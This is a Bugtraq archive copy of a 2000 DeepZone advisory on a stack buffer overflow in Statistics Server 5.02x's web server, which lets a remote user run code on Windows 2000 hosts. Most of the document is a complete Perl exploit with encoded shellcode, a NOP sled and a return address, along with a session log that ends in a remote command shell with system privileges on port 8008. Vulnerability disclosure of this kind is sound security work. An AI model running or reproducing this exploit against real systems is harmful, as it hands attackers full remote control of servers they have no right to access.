Bugtraq mailing list archives
[DeepZone Advisory] Statistics Server 5.02x stack overflow (Win2k remote exploit)
From: |Zan <izan () DEEPZONE ORG>
Date: Thu, 10 Aug 2000 22:02:16 +0200
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Statistics Server 5.02x overflow
Advisory Name: Statistics Server Live Stats
Advisory Released: [00/08/10]
Application: Web site traffic analyzer
Severity: local/remote user can run arbitrary
code with WebServer privileges
Status: vendor contacted
Authors: Nemo - nemo () deepzone org
|Zan - izan () deepzone org
WWW: http://www.deepzone.org
http://deepzone.cjb.net
___________________________________________________________________
OVERVIEW
'Statistics Server is far more than just another log analyzer. It
analyzes Web site traffic in "Real-time" and generates "Live Stats"
reports in an easy to use Web interface.'
'The ability of Statistics Server to deliver Live Web statistics for
high volume installations has made it an essential component of
many corporate Internet and Intranet Web sites and ISP Web hosting
installations.'
___________________________________________________________________
BACKGROUND
Statistics Server 5.02x ships with a stack overflow in its web
component. It *lets run arbitrary code inside* by local/remote user.
Tests, ideas & exploits were tested against Win2k/Spanish version
and WinNT 4.0/sp6a Spanish version.
Web server runs like a system service with a default installation.
___________________________________________________________________
DETAILS
Web server can't handle long requests correctly. When a long GET
(about 2033 bytes) request is made. It dies with EIP overwritten.
It lets run arbitrary code with web servers privileges (system
privileges by default).
___________________________________________________________________
EXPLOIT
It spawns a remote winshell on 8008 port. It doesn't kill webserver
so webserver continues running while hack is made. When hack is
finished webserver will run perfectly too.
ex.
$ lynx http://vulnerable.com
Server Selection
Please Enter Server ID _____________ GO
....
$ ./ssexploit502x.pl vulnerable.com 80
(c) Deep Zone - Statistics Server 5.02x's exploit
Coded by |Zan - izan () deepzone org
-=[ http://www.deepzone.org - http://deepzone.cjb.net ]=-
spawning remote shell on port 8008 ...
HTTP/1.0 302
Server: Statistics Server 5.0
Location: /_XXXXXXXXX_http://XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
... ... ... ... ... ... ...
Content-Type: text/html
Connection: Keep-Alive
Content-Lenght: 0
... done.
$ lynx http://vulnerable.com (It continues working }:)
Server Selection
Please Enter Server ID _____________ GO
....
$ telnet vulnerable.com 8008
Trying vulnerable.com...
Connected to vulnerable.com.
Escape character is '^]'.
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
D:\StatisticsServer>
___________________________________________________________________
FIXES/PATCHES
We contacted Statistics Server support in http://www.mediahouse.com
six weeks ago.
Firstly they told us that new release didn't contain any bof bug.
When we sent a DoS source they told us that new release could have
some problem and it will be fixed in next new release, while we will
be kept to update with fix progress.
We weren't contacted again. Any news about mediahouse.com
Two days ago we email them again asking them about patchs, fixes
and progress. We haven't any reply.
___________________________________________________________________
EXPLOIT SOURCE
bug was discovered by Nemo - nemo () deepzone org while auditing a
very important spanish ISP (others affected).
bug was exploited by |Zan - izan () deepzone org
exploit works against Win2k/Statistics Server 5.02x running like
service.
#!/usr/bin/perl -w
# Statistics Server 5.02x's exploit.
# usage: ./ssexploit502x.pl hostname port
# 00/08/10
# http://www.deepzone.org
# http://deepzone.cjb.net
# http://mareasvivas.cjb.net (|Zan homepage)
#
# --|Zan <izan () deepzone org>
# ----------------------------------------------------------------
#
# This exploit works against Statistics Server 5.02x/Win2k.
#
# Tested with Win2k (spanish version).
#
# It spawns a remote winshell on 8008 port. It doesn't kill
# webserver so webserver continues running while hack is made.
# When hack is finished webserver will run perfectly too.
#
# Default installation gives us a remote shell with system
# privileges.
#
# overflow discovered by
# -- Nemo <nemo () deepzone org>
#
# exploit coded by
# -- |Zan <izan () deepzone org>
#
# ----------------------------------------------------------------
use IO::Socket;
@crash = (
"\x68","\x8b","\x41","\x1d","\x01","\x68","\x41","\x41","\x41",
"\x41","\x68","\x61","\x41","\x41","\x41","\x58","\x59","\x5f",
"\x2b","\xc1","\xaa","\x33","\xc9","\x66","\xb9","\x71","\x04",
"\x90","\x90","\x90","\x68","\xbd","\x3e","\x1d","\x01","\x5e",
"\x56","\x5f","\x33","\xd2","\x80","\xc2","\x99","\xac","\x32",
"\xc2","\xaa","\xe2","\xfa","\x71","\x99","\x99","\x99","\x99",
"\xc4","\x18","\x74","\xaf","\x89","\xd9","\x99","\x14","\x2c",
"\xd4","\x8a","\xd9","\x99","\x14","\x24","\xcc","\x8a","\xd9",
"\x99","\xf3","\x9e","\x09","\x09","\x09","\x09","\xc0","\x71",
"\x4b","\x9b","\x99","\x99","\x14","\x2c","\x1c","\x8a","\xd9",
"\x99","\x14","\x24","\x17","\x8a","\xd9","\x99","\xf3","\x93",
"\x09","\x09","\x09","\x09","\xc0","\x71","\x23","\x9b","\x99",
"\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d","\xd9","\x99",
"\xcf","\x14","\x2c","\x87","\x8d","\xd9","\x99","\xcf","\x14",
"\x2c","\xbb","\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x17",
"\x8a","\xd9","\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d",
"\xd9","\x99","\xcf","\x14","\x2c","\xbf","\x8d","\xd9","\x99",
"\xcf","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\xcf","\x66",
"\x0c","\x17","\x8a","\xd9","\x99","\x5e","\x1c","\xb7","\x8d",
"\xd9","\x99","\xdd","\x99","\x99","\x99","\x14","\x2c","\xb7",
"\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x0b","\x8a","\xd9",
"\x99","\x14","\x2c","\xff","\x8d","\xd9","\x99","\x34","\xc9",
"\x66","\x0c","\x37","\x8a","\xd9","\x99","\x14","\x2c","\xf3",
"\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x37","\x8a",
"\xd9","\x99","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\x14",
"\x24","\xff","\x8d","\xd9","\x99","\x3c","\x14","\x2c","\x87",
"\x8d","\xd9","\x99","\x34","\x14","\x24","\xf3","\x8d","\xd9",
"\x99","\x32","\x14","\x24","\xf7","\x8d","\xd9","\x99","\x32",
"\x5e","\x1c","\xc7","\x8d","\xd9","\x99","\x99","\x99","\x99",
"\x99","\x5e","\x1c","\xc3","\x8d","\xd9","\x99","\x98","\x98",
"\x99","\x99","\x14","\x2c","\xeb","\x8d","\xd9","\x99","\xcf",
"\x14","\x2c","\xb7","\x8d","\xd9","\x99","\xcf","\xf3","\x99",
"\xf3","\x99","\xf3","\x89","\xf3","\x98","\xf3","\x99","\xf3",
"\x99","\x14","\x2c","\x1b","\x8d","\xd9","\x99","\xcf","\xf3",
"\x99","\x66","\x0c","\x0f","\x8a","\xd9","\x99","\xf1","\x99",
"\xb9","\x99","\x99","\x09","\xf1","\x99","\x9b","\x99","\x99",
"\x66","\x0c","\x07","\x8a","\xd9","\x99","\x10","\x1c","\x13",
"\x8d","\xd9","\x99","\xaa","\x59","\xc9","\xd9","\xc9","\xd9",
"\xc9","\x66","\x0c","\xcc","\x8a","\xd9","\x99","\xc9","\xc2",
"\xf3","\x89","\x14","\x2c","\x9b","\x8d","\xd9","\x99","\xcf",
"\xca","\x66","\x0c","\xc0","\x8a","\xd9","\x99","\xf3","\x9a",
"\xca","\x66","\x0c","\xc4","\x8a","\xd9","\x99","\x14","\x2c",
"\x17","\x8d","\xd9","\x99","\xcf","\x14","\x2c","\x9b","\x8d",
"\xd9","\x99","\xcf","\xca","\x66","\x0c","\xf8","\x8a","\xd9",
"\x99","\x14","\x24","\x0b","\x8d","\xd9","\x99","\x32","\xaa",
"\x59","\xc9","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce",
"\xc9","\xc9","\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99",
"\x34","\xc9","\x66","\x0c","\x03","\x8a","\xd9","\x99","\xf3",
"\xa9","\x66","\x0c","\x33","\x8a","\xd9","\x99","\x72","\xd4",
"\x09","\x09","\x09","\xaa","\x59","\xc9","\x14","\x24","\x07",
"\x8d","\xd9","\x99","\xce","\xc9","\xc9","\xc9","\x14","\x2c",
"\xbb","\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03",
"\x8a","\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a",
"\xd9","\x99","\x1a","\x24","\x07","\x8d","\xd9","\x99","\x9b",
"\x96","\x1b","\x8e","\x98","\x99","\x99","\x18","\x24","\x07",
"\x8d","\xd9","\x99","\x98","\xb9","\x99","\x99","\xeb","\x97",
"\x09","\x09","\x09","\x09","\x5e","\x1c","\x07","\x8d","\xd9",
"\x99","\x99","\xb9","\x99","\x99","\xf3","\x99","\x12","\x1c",
"\x07","\x8d","\xd9","\x99","\x14","\x24","\x07","\x8d","\xd9",
"\x99","\xce","\xc9","\x12","\x1c","\x13","\x8d","\xd9","\x99",
"\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99","\x34","\xc9",
"\x66","\x0c","\x3b","\x8a","\xd9","\x99","\xf3","\xa9","\x66",
"\x0c","\x33","\x8a","\xd9","\x99","\x12","\x1c","\x07","\x8d",
"\xd9","\x99","\xf3","\x99","\xc9","\x14","\x2c","\x13","\x8d",
"\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9",
"\x99","\x34","\xc9","\x66","\x0c","\xfc","\x8a","\xd9","\x99",
"\xf3","\x99","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce",
"\xf3","\x99","\xf3","\x99","\xf3","\x99","\x14","\x2c","\xbb",
"\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03","\x8a",
"\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",
"\x99","\xaa","\x50","\xa0","\x14","\x07","\x8d","\xd9","\x99",
"\x96","\x1e","\xfe","\x66","\x66","\x66","\xf3","\x99","\xf1",
"\x99","\xb9","\x99","\x99","\x09","\x14","\x2c","\x13","\x8d",
"\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9",
"\x99","\x34","\xc9","\x66","\x0c","\xf0","\x8a","\xd9","\x99",
"\x10","\x1c","\x03","\x8d","\xd9","\x99","\xf3","\x99","\x14",
"\x24","\x07","\x8d","\xd9","\x99","\xce","\xc9","\x14","\x2c",
"\x13","\x8d","\xd9","\x99","\x34","\xc9","\x14","\x2c","\xbf",
"\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x3f","\x8a",
"\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",
"\x99","\xf3","\x99","\x12","\x1c","\x03","\x8d","\xd9","\x99",
"\x14","\x24","\x07","\x8d","\xd9","\x99","\xce","\xc9","\x12",
"\x1c","\x13","\x8d","\xd9","\x99","\xc9","\x14","\x2c","\xbb",
"\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x3b","\x8a",
"\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",
"\x99","\x70","\x90","\x67","\x66","\x66","\x14","\x2c","\x0b",
"\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\xf4","\x8a",
"\xd9","\x99","\x14","\x2c","\x0f","\x8d","\xd9","\x99","\x34",
"\xc9","\x66","\x0c","\xf4","\x8a","\xd9","\x99","\xf3","\x99",
"\x66","\x0c","\x2b","\x8a","\xd9","\x99","\xc8","\xcf","\xf1",
"\x6d","\x39","\xdc","\x99","\xc3","\x66","\x8b","\xc9","\xc2",
"\xc0","\xce","\xc7","\xc8","\xcf","\xca","\xf1","\xe5","\x38",
"\xdc","\x99","\xc3","\x66","\x8b","\xc9","\x35","\x1d","\x59",
"\xec","\x62","\xc1","\x32","\xc0","\x7b","\x73","\x5a","\xce",
"\xca","\xd6","\xda","\xd2","\xaa","\xab","\x99","\xea","\xf6",
"\xfa","\xf2","\xfc","\xed","\x99","\xfb","\xf0","\xf7","\xfd",
"\x99","\xf5","\xf0","\xea","\xed","\xfc","\xf7","\x99","\xf8",
"\xfa","\xfa","\xfc","\xe9","\xed","\x99","\xea","\xfc","\xf7",
"\xfd","\x99","\xeb","\xfc","\xfa","\xef","\x99","\xfa","\xf5",
"\xf6","\xea","\xfc","\xea","\xf6","\xfa","\xf2","\xfc","\xed",
"\x99","\xd2","\xdc","\xcb","\xd7","\xdc","\xd5","\xaa","\xab",
"\x99","\xda","\xeb","\xfc","\xf8","\xed","\xfc","\xc9","\xf0",
"\xe9","\xfc","\x99","\xde","\xfc","\xed","\xca","\xed","\xf8",
"\xeb","\xed","\xec","\xe9","\xd0","\xf7","\xff","\xf6","\xd8",
"\x99","\xda","\xeb","\xfc","\xf8","\xed","\xfc","\xc9","\xeb",
"\xf6","\xfa","\xfc","\xea","\xea","\xd8","\x99","\xc9","\xfc",
"\xfc","\xf2","\xd7","\xf8","\xf4","\xfc","\xfd","\xc9","\xf0",
"\xe9","\xfc","\x99","\xde","\xf5","\xf6","\xfb","\xf8","\xf5",
"\xd8","\xf5","\xf5","\xf6","\xfa","\x99","\xcb","\xfc","\xf8",
"\xfd","\xdf","\xf0","\xf5","\xfc","\x99","\xce","\xeb","\xf0",
"\xed","\xfc","\xdf","\xf0","\xf5","\xfc","\x99","\xca","\xf5",
"\xfc","\xfc","\xe9","\x99","\xda","\xf5","\xf6","\xea","\xfc",
"\xd1","\xf8","\xf7","\xfd","\xf5","\xfc","\x99","\xdc","\xe1",
"\xf0","\xed","\xcd","\xf1","\xeb","\xfc","\xf8","\xfd","\x99",
"\x9b","\x99","\x86","\xd1","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x95","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x98","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\xda","\xd4","\xdd","\xb7","\xdc","\xc1","\xdc",
"\x99","\x99","\x99","\x99","\x99","\x89","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x90","\x90");
# ----------------------------------------------------------------
sub pcommands
{
die "usage: $0 hostname port\n" if (@ARGV != 2);
($host) = shift @ARGV;
($port) = shift @ARGV;
}
sub show_credits
{
print "\n\n\t (c) 2000 Deep Zone - Statistics Server
5.02x's";
print "exploit\n\n\t\t Coded by |Zan -
izan\@deepzone.org\n";
print "\n\t-=[ http://www.deepzone.org -
http://deepzone.cjb";;
print ".net ]=-\n\n";
}
sub bofit
{
print "\nspawning remote shell on port 8008 ...\n\n";
$s = IO::Socket::INET->new(PeerAddr=>$host,
PeerPort=>$port,
Proto=>"tcp");
if(!$s) { die "error.\n"; }
print $s "GET http://O";;
foreach $item (@crash) {
print $s $item
}
for ($cont=0; $cont<840;$cont++) {
print $s "\x90"
}
print $s "\x8c\x3e\x1d\x01";
print $s "\r\n\r\n";
while (<$s>) { print }
print "... done.\n\n";
}
# ----- begin
show_credits;
pcommands;
bofit;
# ----- that's all :)
___________________________________________________________________
GREETINGS
Attrition, beavuh, ADM, Technotronic, b0f .... and of course ....
RFP and Wiretrip
-- ] EOF
- --
|Zan / DeepZone (tm) - Digital Security Center
http://www.deepzone.org - http://mareasvivas.cjb.net
PGP key fingerprint:
AD 97 A6 AB DC BB D2 CF 89 AE 0A 88 7E 5D 9D 97 BB F6 B0 B8
- --=[ ... toda la vida buscando respuestas ... y cuando por fin
las encuentras ... cambian las preguntas ]=--
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.3 for non-commercial use <http://www.pgp.com>
iQA/AwUBOZL7j35dnZe79rC4EQKNBgCg50QJs6JqKM0gOjBJ+KfaQ7lWAnwAnAkI
IS4fs41nCvWP7tULf0KwU0m8
=Gnrm
-----END PGP SIGNATURE-----
Current thread:
- [DeepZone Advisory] Statistics Server 5.02x stack overflow (Win2k remote exploit) |Zan (Aug 11)